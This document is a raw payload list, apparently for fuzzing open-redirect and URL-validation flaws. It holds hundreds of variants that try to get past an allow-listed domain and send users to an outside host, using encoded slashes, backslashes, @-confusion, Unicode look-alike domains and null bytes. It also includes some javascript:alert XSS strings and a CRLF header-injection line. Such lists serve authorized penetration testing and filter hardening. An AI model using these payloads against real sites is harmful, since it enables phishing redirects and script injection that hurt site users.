";alert(0);//
#//google.com
#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
$2f%2f142.251.129.35%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%01https://google.com
%01https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%09Jav%09ascript:alert(1)
%0A/google.com
%0A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
%19Jav%09asc%09ript:https%20://site-em-whitelist.com.br/%250Aconfirm%25281%2529
%252F@google.com
%252F@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f$2f142.251.129.35
%2f$2f3627734734
%2f$2fgoogle.com
%2f142.251.129.35
%2f142.251.129.35%2f%2f
%2f142.251.129.35//
%2f3627734734
%2f3627734734%2f%2f
%2f3627734734//
%2fgoogle.com
%2fgoogle.com%2f%2f
%2fgoogle.com//
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
&%0d%0a1Location:https://google.com
../google.com
.google.com
.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/#//google.com
/#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/google.com
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/site-em-whitelist.com.br
/%09/site-em-whitelist.com.br@google.com
/%09/site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2F/google.com
/%2F/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fgoogle.com
/%2f%2fsite-em-whitelist.com.br
/%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
/%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5csite-em-whitelist.com.br
/%5csite-em-whitelist.com.br@google.com
/%5csite-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5csite-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.google.com
/.site-em-whitelist.com.br
/.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/google.com
//%09/site-em-whitelist.com.br
//%09/site-em-whitelist.com.br@google.com
//%09/site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fgoogle.com
//%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2fxgoogle.com
//%5cgoogle.com
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5csite-em-whitelist.com.br
//%5csite-em-whitelist.com.br@google.com
//%5csite-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5csite-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//.@.@google.com
//.@.@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/google.com
///%09/site-em-whitelist.com.br
///%09/site-em-whitelist.com.br@google.com
///%09/site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cgoogle.com
///%5csite-em-whitelist.com.br
///%5csite-em-whitelist.com.br@google.com
///%5csite-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5csite-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/google.com
////%09/site-em-whitelist.com.br
////%09/site-em-whitelist.com.br@google.com
////%09/site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cgoogle.com
////%5csite-em-whitelist.com.br
////%5csite-em-whitelist.com.br@google.com
////%5csite-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5csite-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////google.com
/////google.com/
/////site-em-whitelist.com.br
/////site-em-whitelist.com.br/
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////142.251.129.35
////3627734734
////\;@google.com
////\;@site-em-whitelist.com.br
////google.com
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
////site-em-whitelist.com.br/
////site-em-whitelist.com.br/%2e%2e
////site-em-whitelist.com.br/%2e%2e%2f
////site-em-whitelist.com.br/%2f%2e%2e
////site-em-whitelist.com.br/%2f..
////site-em-whitelist.com.br//
////site-em-whitelist.com.br@google.com/
////site-em-whitelist.com.br@google.com/%2e%2e
////site-em-whitelist.com.br@google.com/%2e%2e%2f
////site-em-whitelist.com.br@google.com/%2f%2e%2e
////site-em-whitelist.com.br@google.com/%2f..
////site-em-whitelist.com.br@google.com//
////site-em-whitelist.com.br@www.google.com/%2e%2e
////site-em-whitelist.com.br@www.google.com/%2e%2e%2f
////site-em-whitelist.com.br@www.google.com/%2f%2e%2e
////site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒã€‚ï¼°â“¦
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///142.251.129.35
///3627734734
///;@google.com
///\;@google.com
///\;@site-em-whitelist.com.br
///\;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\ï¹”@google.com
///\ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///google.com
///google.com/
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
///google.com/%2f..
///google.com//
///site-em-whitelist.com.br
///site-em-whitelist.com.br/
///site-em-whitelist.com.br/%2e%2e
///site-em-whitelist.com.br/%2e%2e%2f
///site-em-whitelist.com.br/%2f%2e%2e
///site-em-whitelist.com.br/%2f..
///site-em-whitelist.com.br//
///site-em-whitelist.com.br@google.com/
///site-em-whitelist.com.br@google.com/%2e%2e
///site-em-whitelist.com.br@google.com/%2e%2e%2f
///site-em-whitelist.com.br@google.com/%2f%2e%2e
///site-em-whitelist.com.br@google.com/%2f..
///site-em-whitelist.com.br@google.com//
///site-em-whitelist.com.br@www.google.com/%2e%2e
///site-em-whitelist.com.br@www.google.com/%2e%2e%2f
///site-em-whitelist.com.br@www.google.com/%2f%2e%2e
///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///www.google.com/%2e%2e
///www.google.com/%2e%2e%2f
///www.google.com/%2f%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//142.251.129.35
//3627734734
//3H6k7lIAiqjfNeN@site-em-whitelist.com.br+@google.com/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.br+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.br+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.br@google.com/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.brâº@google.com/
//3H6k7lIAiqjfNeN@site-em-whitelist.com.brâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//;@google.com
//;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//XY>.7d8T\205pZM@site-em-whitelist.com.br+@google.com/
//XY>.7d8T\205pZM@site-em-whitelist.com.br+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@site-em-whitelist.com.br+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@site-em-whitelist.com.br@google.com/
//XY>.7d8T\205pZM@site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@site-em-whitelist.com.brâº@google.com/
//XY>.7d8T\205pZM@site-em-whitelist.com.brâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\/google.com/
//\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\google.com
//google%00.com
//google%E3%80%82com
//google.com
//google.com%23@site-em-whitelist.com.br
//google.com%FF@site-em-whitelist.com.br
//google.com/
//google.com/%2E%2E
//google.com/%2F..
//google.com/%2F..
//google.com/%2e%2e
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//google.com/%2f..
//google.com//
//google.com//%2F%2E%2E
//google.com/site-em-whitelist.com.br
//google.com:80#@site-em-whitelist.com.br/
//google.com:80?@site-em-whitelist.com.br/
//google.com?
//google.com\@.site-em-whitelist.com.br
//google.com\@site-em-whitelist.com.br
//google.com\\@.site-em-whitelist.com.br
//google.com\tsite-em-whitelist.com.br/
//google.com\udfff@site-em-whitelist.com.br/
//google.com\áµ—site-em-whitelist.com.br
//google.comï¿½@site-em-whitelist.com.br/
//googleã€‚com
//https:///google.com/%2e%2e
//https:///site-em-whitelist.com.br/%2e%2e
//https:///www.google.com/%2e%2e
//https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://google.com/%2e%2e%2f
//https://google.com//
//https://site-em-whitelist.com.br/%2e%2e%2f
//https://site-em-whitelist.com.br//
//https://site-em-whitelist.com.br@google.com/%2e%2e%2f
//https://site-em-whitelist.com.br@google.com//
//https://site-em-whitelist.com.br@www.google.com/%2e%2e%2f
//https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://www.google.com/%2e%2e%2f
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//javascript:alert(1)
//javascript:alert(1);
//site-em-whitelist.com.br
//site-em-whitelist.com.br+&@google.com#+@site-em-whitelist.com.br/
//site-em-whitelist.com.br+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@site-em-whitelist.com.br/
//site-em-whitelist.com.br+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@site-em-whitelist.com.br/
//site-em-whitelist.com.br/
//site-em-whitelist.com.br/%2e%2e
//site-em-whitelist.com.br/%2e%2e%2f
//site-em-whitelist.com.br/%2f%2e%2e
//site-em-whitelist.com.br/%2f..
//site-em-whitelist.com.br/../..%20.google.com
//site-em-whitelist.com.br/../..%20.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//site-em-whitelist.com.br//
//site-em-whitelist.com.br@google.com/
//site-em-whitelist.com.br@google.com/%2e%2e%2f
//site-em-whitelist.com.br@google.com/%2f%2e%2e
//site-em-whitelist.com.br@google.com/%2f..
//site-em-whitelist.com.br@google.com//
//site-em-whitelist.com.br@https:///google.com/%2e%2e
//site-em-whitelist.com.br@https:///www.google.com/%2e%2e
//site-em-whitelist.com.br@https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//site-em-whitelist.com.br@https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//site-em-whitelist.com.br@www.google.com/%2e%2e%2f
//site-em-whitelist.com.br@www.google.com/%2f%2e%2e
//site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//site-em-whitelist.com.br@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//site-em-whitelist.com.br@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//site-em-whitelist.com.brâº&@google.com#âº@site-em-whitelist.com.br/
//site-em-whitelist.com.brâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@site-em-whitelist.com.br/
//site-em-whitelist.com.brï½¡â‚¨/
//www.google.com
//www.google.com/%2e%2e%2f
//www.google.com/%2f%2e%2e
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/site-em-whitelist.com.br
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@site-em-whitelist.com.br/
